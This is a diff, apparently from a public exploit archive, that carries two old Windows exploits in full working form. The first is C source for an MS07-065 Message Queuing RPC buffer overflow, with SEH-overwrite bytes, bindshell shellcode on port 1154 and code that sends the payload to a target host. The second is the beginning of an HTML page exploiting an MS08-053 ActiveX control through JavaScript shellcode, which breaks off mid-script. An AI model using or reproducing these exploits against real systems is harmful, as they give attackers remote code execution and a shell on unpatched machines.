-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0xeb, 0x06, 0x42, 0x42, 0x32, 0xb0,     // \xeb\x06\x42\x42 jmpcode
+0x41, 0x41, 0xeb, 0x06, 0x42, 0x42, 0x32, 0xb0,     // \xeb\x06\x42\x42 jmpcode
-0x01, 0x78, 0x2b, 0xc9, 0x83, 0xe9, 0xb0, 0xd9,     //  overwrite seh ; call ebx
+0x01, 0x78, 0x2b, 0xc9, 0x83, 0xe9, 0xb0, 0xd9,     //  overwrite seh ; call ebx
-0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73,     //  bindshell on port 1154, metasploit shellcode
+0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73,     //  bindshell on port 1154, metasploit shellcode
-0x13, 0x1d, 0x82, 0x67, 0xb4, 0x83, 0xeb, 0xfc,
+0x13, 0x1d, 0x82, 0x67, 0xb4, 0x83, 0xeb, 0xfc,
-0xe2, 0xf4, 0xe1, 0xe8, 0x8c, 0xf9, 0xf5, 0x7b,
+0xe2, 0xf4, 0xe1, 0xe8, 0x8c, 0xf9, 0xf5, 0x7b,
-0x98, 0x4b, 0xe2, 0xe2, 0xec, 0xd8, 0x39, 0xa6,
+0x98, 0x4b, 0xe2, 0xe2, 0xec, 0xd8, 0x39, 0xa6,
-0xec, 0xf1, 0x21, 0x09, 0x1b, 0xb1, 0x65, 0x83,
+0xec, 0xf1, 0x21, 0x09, 0x1b, 0xb1, 0x65, 0x83,
-0x88, 0x3f, 0x52, 0x9a, 0xec, 0xeb, 0x3d, 0x83,
+0x88, 0x3f, 0x52, 0x9a, 0xec, 0xeb, 0x3d, 0x83,
-0x8c, 0xfd, 0x96, 0xb6, 0xec, 0xb5, 0xf3, 0xb3,
+0x8c, 0xfd, 0x96, 0xb6, 0xec, 0xb5, 0xf3, 0xb3,
-0xa7, 0x2d, 0xb1, 0x06, 0xa7, 0xc0, 0x1a, 0x43,
+0xa7, 0x2d, 0xb1, 0x06, 0xa7, 0xc0, 0x1a, 0x43,
-0xad, 0xb9, 0x1c, 0x40, 0x8c, 0x40, 0x26, 0xd6,
+0xad, 0xb9, 0x1c, 0x40, 0x8c, 0x40, 0x26, 0xd6,
-0x43, 0x9c, 0x68, 0x67, 0xec, 0xeb, 0x39, 0x83,
+0x43, 0x9c, 0x68, 0x67, 0xec, 0xeb, 0x39, 0x83,
-0x8c, 0xd2, 0x96, 0x8e, 0x2c, 0x3f, 0x42, 0x9e,
+0x8c, 0xd2, 0x96, 0x8e, 0x2c, 0x3f, 0x42, 0x9e,
-0x66, 0x5f, 0x1e, 0xae, 0xec, 0x3d, 0x71, 0xa6,
+0x66, 0x5f, 0x1e, 0xae, 0xec, 0x3d, 0x71, 0xa6,
-0x7b, 0xd5, 0xde, 0xb3, 0xbc, 0xd0, 0x96, 0xc1,
+0x7b, 0xd5, 0xde, 0xb3, 0xbc, 0xd0, 0x96, 0xc1,
-0x57, 0x3f, 0x5d, 0x8e, 0xec, 0xc4, 0x01, 0x2f,
+0x57, 0x3f, 0x5d, 0x8e, 0xec, 0xc4, 0x01, 0x2f,
-0xec, 0xf4, 0x15, 0xdc, 0x0f, 0x3a, 0x53, 0x8c,
+0xec, 0xf4, 0x15, 0xdc, 0x0f, 0x3a, 0x53, 0x8c,
-0x8b, 0xe4, 0xe2, 0x54, 0x01, 0xe7, 0x7b, 0xea,
+0x8b, 0xe4, 0xe2, 0x54, 0x01, 0xe7, 0x7b, 0xea,
-0x54, 0x86, 0x75, 0xf5, 0x14, 0x86, 0x42, 0xd6,
+0x54, 0x86, 0x75, 0xf5, 0x14, 0x86, 0x42, 0xd6,
-0x98, 0x64, 0x75, 0x49, 0x8a, 0x48, 0x26, 0xd2,
+0x98, 0x64, 0x75, 0x49, 0x8a, 0x48, 0x26, 0xd2,
-0x98, 0x62, 0x42, 0x0b, 0x82, 0xd2, 0x9c, 0x6f,
+0x98, 0x62, 0x42, 0x0b, 0x82, 0xd2, 0x9c, 0x6f,
-0x6f, 0xb6, 0x48, 0xe8, 0x65, 0x4b, 0xcd, 0xea,
+0x6f, 0xb6, 0x48, 0xe8, 0x65, 0x4b, 0xcd, 0xea,
-0xbe, 0xbd, 0xe8, 0x2f, 0x30, 0x4b, 0xcb, 0xd1,
+0xbe, 0xbd, 0xe8, 0x2f, 0x30, 0x4b, 0xcb, 0xd1,
-0x34, 0xe7, 0x4e, 0xd1, 0x24, 0xe7, 0x5e, 0xd1,
+0x34, 0xe7, 0x4e, 0xd1, 0x24, 0xe7, 0x5e, 0xd1,
-0x98, 0x64, 0x7b, 0xea, 0x63, 0x36, 0x7b, 0xd1,
+0x98, 0x64, 0x7b, 0xea, 0x63, 0x36, 0x7b, 0xd1,
-0xee, 0x55, 0x88, 0xea, 0xc3, 0xae, 0x6d, 0x45,
+0xee, 0x55, 0x88, 0xea, 0xc3, 0xae, 0x6d, 0x45,
-0x30, 0x4b, 0xcb, 0xe8, 0x77, 0xe5, 0x48, 0x7d,
+0x30, 0x4b, 0xcb, 0xe8, 0x77, 0xe5, 0x48, 0x7d,
-0xb7, 0xdc, 0xb9, 0x2f, 0x49, 0x5d, 0x4a, 0x7d,
+0xb7, 0xdc, 0xb9, 0x2f, 0x49, 0x5d, 0x4a, 0x7d,
-0xb1, 0xe7, 0x48, 0x7d, 0xb7, 0xdc, 0xf8, 0xcb,
+0xb1, 0xe7, 0x48, 0x7d, 0xb7, 0xdc, 0xf8, 0xcb,
-0xe1, 0xfd, 0x4a, 0x7d, 0xb1, 0xe4, 0x49, 0xd6,
+0xe1, 0xfd, 0x4a, 0x7d, 0xb1, 0xe4, 0x49, 0xd6,
-0x32, 0x4b, 0xcd, 0x11, 0x0f, 0x53, 0x64, 0x44,
+0x32, 0x4b, 0xcd, 0x11, 0x0f, 0x53, 0x64, 0x44,
-0x1e, 0xe3, 0xe2, 0x54, 0x32, 0x4b, 0xcd, 0xe4,
+0x1e, 0xe3, 0xe2, 0x54, 0x32, 0x4b, 0xcd, 0xe4,
-0x0d, 0xd0, 0x7b, 0xea, 0x04, 0xd9, 0x94, 0x67,
+0x0d, 0xd0, 0x7b, 0xea, 0x04, 0xd9, 0x94, 0x67,
-0x0d, 0xe4, 0x44, 0xab, 0xab, 0x3d, 0xfa, 0xe8,
+0x0d, 0xe4, 0x44, 0xab, 0xab, 0x3d, 0xfa, 0xe8,
-0x23, 0x3d, 0xff, 0xb3, 0xa7, 0x47, 0xb7, 0x7c,
+0x23, 0x3d, 0xff, 0xb3, 0xa7, 0x47, 0xb7, 0x7c,
-0x25, 0x99, 0xe3, 0xc0, 0x4b, 0x27, 0x90, 0xf8,
+0x25, 0x99, 0xe3, 0xc0, 0x4b, 0x27, 0x90, 0xf8,
-0x5f, 0x1f, 0xb6, 0x29, 0x0f, 0xc6, 0xe3, 0x31,
+0x5f, 0x1f, 0xb6, 0x29, 0x0f, 0xc6, 0xe3, 0x31,
-0x71, 0x4b, 0x68, 0xc6, 0x98, 0x62, 0x46, 0xd5,
+0x71, 0x4b, 0x68, 0xc6, 0x98, 0x62, 0x46, 0xd5,
-0x35, 0xe5, 0x4c, 0xd3, 0x0d, 0xb5, 0x4c, 0xd3,
+0x35, 0xe5, 0x4c, 0xd3, 0x0d, 0xb5, 0x4c, 0xd3,
-0x32, 0xe5, 0xe2, 0x52, 0x0f, 0x19, 0xc4, 0x87,
+0x32, 0xe5, 0xe2, 0x52, 0x0f, 0x19, 0xc4, 0x87,
-0xa9, 0xe7, 0xe2, 0x54, 0x0d, 0x4b, 0xe2, 0xb5,
+0xa9, 0xe7, 0xe2, 0x54, 0x0d, 0x4b, 0xe2, 0xb5,
-0x98, 0x64, 0x96, 0xd5, 0x9b, 0x37, 0xd9, 0xe6,
+0x98, 0x64, 0x96, 0xd5, 0x9b, 0x37, 0xd9, 0xe6,
-0x98, 0x62, 0x4f, 0x7d, 0xb7, 0xdc, 0xf2, 0x4c,
+0x98, 0x62, 0x4f, 0x7d, 0xb7, 0xdc, 0xf2, 0x4c,
-0x87, 0xd4, 0x4e, 0x7d, 0xb1, 0x4b, 0xcd, 0x82,
+0x87, 0xd4, 0x4e, 0x7d, 0xb1, 0x4b, 0xcd, 0x82,
-0x67, 0xb4, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41};
+0x67, 0xb4, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41};
- 
+ 
- 
+ 
-char request_2[] = {
+char request_2[] = {
-0x05, 0x00, 0x00, 0x82, 0x10, 0x00, 0x00, 0x00,
+0x05, 0x00, 0x00, 0x82, 0x10, 0x00, 0x00, 0x00,
-0x18, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
+0x18, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
-0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
+0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,
-0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
+0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,
-0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
+0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
+0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
-0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
-0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
+0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };
- 
+ 
- 
+ 
- 
+ 
-void usage(char *argv) {
+void usage(char *argv) {
-   printf(" Usage:   %s -h 127.0.0.1 (Universal exploit)\n",argv);
+   printf(" Usage:   %s -h 127.0.0.1 (Universal exploit)\n",argv);
-   printf("          %s -h host [-p port]\n",argv);
+   printf("          %s -h host [-p port]\n",argv);
-   printf(" Targets:\n");
+   printf(" Targets:\n");
-   exit(1);   
+   exit(1);   
-}
+}
- 
+ 
- 
+ 
- 
+ 
-/************* TCP connect *************************/
+/************* TCP connect *************************/
- 
+ 
-void Disconnect(SOCKET s);
+void Disconnect(SOCKET s);
- 
+ 
- 
+ 
-// ripped from isno
+// ripped from isno
-int Make_Connection(char *address,int port,int timeout)
+int Make_Connection(char *address,int port,int timeout)
-{
+{
-    struct sockaddr_in target;
+    struct sockaddr_in target;
-    SOCKET s;
+    SOCKET s;
-    int i;
+    int i;
-    DWORD bf;
+    DWORD bf;
-    fd_set wd;
+    fd_set wd;
-    struct timeval tv;
+    struct timeval tv;
- 
+ 
-    s = socket(AF_INET,SOCK_STREAM,0);
+    s = socket(AF_INET,SOCK_STREAM,0);
-    if(s<0)
+    if(s<0)
-        return -1;
+        return -1;
- 
+ 
-    target.sin_family = AF_INET;
+    target.sin_family = AF_INET;
-    target.sin_addr.s_addr = inet_addr(address);
+    target.sin_addr.s_addr = inet_addr(address);
-    if(target.sin_addr.s_addr==0)
+    if(target.sin_addr.s_addr==0)
-    {
+    {
-        closesocket(s);
+        closesocket(s);
-        return -2;
+        return -2;
-    }
+    }
-    target.sin_port = htons((short)port);
+    target.sin_port = htons((short)port);
-    bf = 1;
+    bf = 1;
-    ioctlsocket(s,FIONBIO,&bf);
+    ioctlsocket(s,FIONBIO,&bf);
-    tv.tv_sec = timeout;
+    tv.tv_sec = timeout;
-    tv.tv_usec = 0;
+    tv.tv_usec = 0;
-    FD_ZERO(&wd);
+    FD_ZERO(&wd);
-    FD_SET(s,&wd);
+    FD_SET(s,&wd);
-    connect(s,(struct sockaddr *)&target,sizeof(target));
+    connect(s,(struct sockaddr *)&target,sizeof(target));
-    if((i=select(s+1,0,&wd,0,&tv))==(-1))
+    if((i=select(s+1,0,&wd,0,&tv))==(-1))
-    {
+    {
-        closesocket(s);
+        closesocket(s);
-        return -3;
+        return -3;
-    }
+    }
-    if(i==0)
+    if(i==0)
-    {
+    {
-        closesocket(s);
+        closesocket(s);
-        return -4;
+        return -4;
-    }
+    }
-    i = sizeof(int);
+    i = sizeof(int);
-    getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
+    getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
-    if((bf!=0)||(i!=sizeof(int)))
+    if((bf!=0)||(i!=sizeof(int)))
-    {
+    {
-        closesocket(s);
+        closesocket(s);
-        return -5;
+        return -5;
-    }
+    }
-    ioctlsocket(s,FIONBIO,&bf);
+    ioctlsocket(s,FIONBIO,&bf);
-    return s;
+    return s;
-}
+}
- 
+ 
- 
+ 
-void Disconnect(SOCKET s)
+void Disconnect(SOCKET s)
-{
+{
-         closesocket(s);
+         closesocket(s);
-         WSACleanup();
+         WSACleanup();
-}
+}
- 
+ 
-/****************************************************/
+/****************************************************/
- 
+ 
- 
+ 
- 
+ 
-int main(int argc, char * argv[]){
+int main(int argc, char * argv[]){
- 
+ 
-   unsigned char * target = NULL;
+   unsigned char * target = NULL;
-   int port = 2103;
+   int port = 2103;
-   int i;
+   int i;
- 
+ 
-   int  ret;
+   int  ret;
-   char buffer[6000] = {0};
+   char buffer[6000] = {0};
-   SOCKET  s;
+   SOCKET  s;
-   WSADATA WSAData;
+   WSADATA WSAData;
- 
+ 
-   printf("--------------------------------------------------------------------------\n");
+   printf("--------------------------------------------------------------------------\n");
-   printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) ==-\n");
+   printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) ==-\n");
-   printf("-== code by axis@ph4nt0m ==-\n");
+   printf("-== code by axis@ph4nt0m ==-\n");
-   printf("-== Http://www.ph4nt0m.org ==-\n");
+   printf("-== Http://www.ph4nt0m.org ==-\n");
-   printf("-== Tested against Windows 2000 server SP4 ==-\n");
+   printf("-== Tested against Windows 2000 server SP4 ==-\n");
-   printf("--------------------------------------------------------------------------\n\n");
+   printf("--------------------------------------------------------------------------\n\n");
- 
+ 
- 
+ 
-    if (argc==1) usage(argv[0]); //Handle parameters
+    if (argc==1) usage(argv[0]); //Handle parameters
-     for(i=1;i<argc;i++) {
+     for(i=1;i<argc;i++) {
-      if ( (argv[i][0]=='-') ) {
+      if ( (argv[i][0]=='-') ) {
-         switch (argv[i][1]) {
+         switch (argv[i][1]) {
-         case 'h':
+         case 'h':
-            target=(unsigned char *)argv[i+1];
+            target=(unsigned char *)argv[i+1];
-            break;
+            break;
-         case 'p':
+         case 'p':
-            if (strcmp(argv[i+1],"2103")==0) {
+            if (strcmp(argv[i+1],"2103")==0) {
-               printf("[+] Attacking default port 2103\n");
+               printf("[+] Attacking default port 2103\n");
-            } else {
+            } else {
-               port=atoi(argv[i+1]);
+               port=atoi(argv[i+1]);
-            }
+            }
-            break;            
+            break;            
-         default:
+         default:
-            printf("[-] Invalid argument: %s\n",argv[i]);
+            printf("[-] Invalid argument: %s\n",argv[i]);
-            usage(argv[0]);
+            usage(argv[0]);
-            break;
+            break;
-         }
+         }
-         i++;            
+         i++;            
-           } else usage(argv[0]);
+           } else usage(argv[0]);
-          }
+          }
- 
+ 
-/********************** attack payload ***************************/
+/********************** attack payload ***************************/
-                    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
+                    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
-                    {
+                    {
-            fprintf(stderr, "[-] WSAStartup failed.\n");
+            fprintf(stderr, "[-] WSAStartup failed.\n");
-            WSACleanup();
+            WSACleanup();
-            exit(1);
+            exit(1);
-                    }
+                    }
- 
+ 
- 
+ 
-                    //Sleep(1200);
+                    //Sleep(1200);
- 
+ 
- 
+ 
-         s = Make_Connection((char *)target, port, 10);
+         s = Make_Connection((char *)target, port, 10);
-         if(s<0)
+         if(s<0)
-                    {
+                    {
-            fprintf(stderr, "[-] connect err.\n");
+            fprintf(stderr, "[-] connect err.\n");
-            exit(1);
+            exit(1);
-                    }
+                    }
- 
+ 
-                   //Send our evil Payload              
+                   //Send our evil Payload              
-        printf("[*]Sending our Payload, Good Luck! ^_^\n");
+        printf("[*]Sending our Payload, Good Luck! ^_^\n");
- 
+ 
-                   printf("[*]Sending RPC Bind String!\n");
+                   printf("[*]Sending RPC Bind String!\n");
-                   send(s, bind_str, sizeof(bind_str), 0);
+                   send(s, bind_str, sizeof(bind_str), 0);
- 
+ 
-                   Sleep(1000);
+                   Sleep(1000);
-                  
+                  
-                   printf("[*]Sending RPC Request Now!\n");
+                   printf("[*]Sending RPC Request Now!\n");
-                   memset(buffer, '\x41', sizeof(buffer));  // fil the buffer to trigger seh
+                   memset(buffer, '\x41', sizeof(buffer));  // fil the buffer to trigger seh
-    send(s, request_1, sizeof(request_1), 0);
+    send(s, request_1, sizeof(request_1), 0);
-                   send(s, buffer, 5104, 0);   // fil the buffer to trigger seh
+                   send(s, buffer, 5104, 0);   // fil the buffer to trigger seh
-                   send(s, request_2, sizeof(request_2), 0);
+                   send(s, request_2, sizeof(request_2), 0);
-                  
+                  
- 
+ 
-        Sleep(100);
+        Sleep(100);
- 
+ 
-             memset(buffer, 0, sizeof(buffer));
+             memset(buffer, 0, sizeof(buffer));
-             ret = recv(s, buffer, sizeof(buffer)-1, 0);
+             ret = recv(s, buffer, sizeof(buffer)-1, 0);
-                   //printf("recv: %s\n", buffer);
+                   //printf("recv: %s\n", buffer);
- 
+ 
-                   Disconnect(s);
+                   Disconnect(s);
- 
+ 
-                   return 0;
+                   return 0;
-}
+}
-
+
-// milw0rm.com [2007-12-18]
+// milw0rm.com [2007-12-18]
--- a/platforms/windows/remote/6454.html
+++ b/platforms/windows/remote/6454.html
@ -1,64 +1,64 @@
-<html>
+<html>
-<pre>
+<pre>
-
+
- =============================================================================
+ =============================================================================
- MS08-053 Windows Media Encoder wmex.dll ActiveX Control Buffer Overflow  
+ MS08-053 Windows Media Encoder wmex.dll ActiveX Control Buffer Overflow  
- =============================================================================
+ =============================================================================
-
+
- Calc execution POC Exploit for WinXP SP2 PRO English / IE6.0 SP2
+ Calc execution POC Exploit for WinXP SP2 PRO English / IE6.0 SP2
-
+
- Found by   : Nguyen Minh Duc and Le Manh Tung
+ Found by   : Nguyen Minh Duc and Le Manh Tung
- Advisory   : http://www.microsoft.com/technet/security/Bulletin/MS08-053.mspx
+ Advisory   : http://www.microsoft.com/technet/security/Bulletin/MS08-053.mspx
- 
+ 
- Exploit by : haluznik | haluznik<at>gmail.com
+ Exploit by : haluznik | haluznik<at>gmail.com
-
+
- 09.10.2008 
+ 09.10.2008 
- =============================================================================
+ =============================================================================
-
+
-<input language=JavaScript onclick=poc() type=button value="launch exploit">
+<input language=JavaScript onclick=poc() type=button value="launch exploit">
-
+
-<OBJECT id="target" classid="clsid:A8D3AD02-7508-4004-B2E9-AD33F087F43C">
+<OBJECT id="target" classid="clsid:A8D3AD02-7508-4004-B2E9-AD33F087F43C">
-</OBJECT>
+</OBJECT>
-
+
-<script>
+<script>
-
+
-function poc() {
+function poc() {
- 
+ 
-var shellcode = unescape(
+var shellcode = unescape(
-"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4948%u4949" +
+"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4948%u4949" +
-"%u4949%u4949%u4949%u4949%u5a51%u436a%u3058%u3142%u4250%u6b41" +
+"%u4949%u4949%u4949%u4949%u5a51%u436a%u3058%u3142%u4250%u6b41" +
-"%u4142%u4253%u4232%u3241%u4141%u4130%u5841%u3850%u4242%u4875" +
+"%u4142%u4253%u4232%u3241%u4141%u4130%u5841%u3850%u4242%u4875" +
-"%u6b69%u4d4c%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
+"%u6b69%u4d4c%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
-"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f%u6e68%u736b" +
+"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f%u6e68%u736b" +
-"%u716f%u6530%u6a51%u724b%u4e69%u366b%u4e54%u456b%u4a51%u464e" +
+"%u716f%u6530%u6a51%u724b%u4e69%u366b%u4e54%u456b%u4a51%u464e" +
-"%u6b51%u4f70%u4c69%u6e6c%u5964%u7350%u5344%u5837%u7a41%u546a" +
+"%u6b51%u4f70%u4c69%u6e6c%u5964%u7350%u5344%u5837%u7a41%u546a" +
-"%u334d%u7831%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
+"%u334d%u7831%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
-"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b%u726c%u4c6b" +
+"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b%u726c%u4c6b" +
-"%u534b%u376f%u636c%u6a31%u4e4b%u756b%u6c4c%u544b%u4841%u4d6b" +
+"%u534b%u376f%u636c%u6a31%u4e4b%u756b%u6c4c%u544b%u4841%u4d6b" +
-"%u5159%u514c%u3434%u4a44%u3063%u6f31%u6230%u4e44%u716b%u5450" +
+"%u5159%u514c%u3434%u4a44%u3063%u6f31%u6230%u4e44%u716b%u5450" +
-"%u4b70%u6b35%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
+"%u4b70%u6b35%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
-"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b%u6c30%u5770" +
+"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b%u6c30%u5770" +
-"%u5770%u4770%u4c70%u704b%u4768%u714c%u444f%u6b71%u3346%u6650" +
+"%u5770%u4770%u4c70%u704b%u4768%u714c%u444f%u6b71%u3346%u6650" +
-"%u4f36%u4c79%u6e38%u4f63%u7130%u306b%u4150%u5878%u6c70%u534a" +
+"%u4f36%u4c79%u6e38%u4f63%u7130%u306b%u4150%u5878%u6c70%u534a" +
-"%u5134%u334f%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
+"%u5134%u334f%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
-"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f%u4147%u4163" +
+"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f%u4147%u4163" +
-"%u504c%u4273%u3159%u5063%u6574%u7035%u546d%u6573%u3362%u306c" +
+"%u504c%u4273%u3159%u5063%u6574%u7035%u546d%u6573%u3362%u306c" +
-"%u4163%u7071%u536c%u6653%u314e%u7475%u7038%u7765%u4370");
+"%u4163%u7071%u536c%u6653%u314e%u7475%u7038%u7765%u4370");
-
+
-var buff= "";
+var buff= "";
-var nsp = unescape("%u06EB%u9090");
+var nsp = unescape("%u06EB%u9090");
-var sh = unescape("%u6950%u74C9");
+var sh = unescape("%u6950%u74C9");
